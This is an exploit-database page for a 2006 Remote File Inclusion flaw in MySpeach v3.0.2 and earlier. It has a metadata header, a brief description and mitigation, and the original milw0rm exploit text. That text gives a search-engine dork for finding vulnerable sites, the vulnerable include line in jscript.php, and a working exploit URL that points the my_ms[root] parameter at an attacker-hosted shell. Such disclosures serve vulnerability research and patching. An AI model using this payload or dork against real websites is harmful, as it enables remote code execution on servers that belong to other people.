header-logo
Suggest Exploit
vendor:
MySpeach
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: MySpeach
Affected Version From: v3.0.2
Affected Version To: All versions below v3.0.2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

MySpeach <= v3.0.2 (my_ms[root]) Remote File Inclusion Exploit

MySpeach version 3.0.2 and all versions below are vulnerable to a Remote File Inclusion vulnerability. The vulnerability exists in the jscript.php file, which allows an attacker to include a remote file by manipulating the my_ms[root] parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an URL pointing to a malicious file.

Mitigation:

Upgrade to the latest version of MySpeach, or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

#==============================================================================================
#MySpeach <= v3.0.2 (my_ms[root]) Remote File Inclusion Exploit
#===============================================================================================
#                                                                        
#Critical Level : Very Dangerous                                              
#                                                                        
#Venedor site : http://www.graphiks.net/telecharger/scripts/myspeach.zip        
#                                                                        
#Version : v3.0.2 & All Versions Bellow                                              
#                                                          
#================================================================================================
#
#Dork : allinurl: /myspeach/
#
#================================================================================================
#Bug in : jscript.php
#
#Vlu Code :
#--------------------------------
#     include($my_ms["root"].'/error.php');
#  
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/jscript.php?my_ms[root]=http://SHELLURL.COM?
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
==================================================================================================

# milw0rm.com [2006-09-05]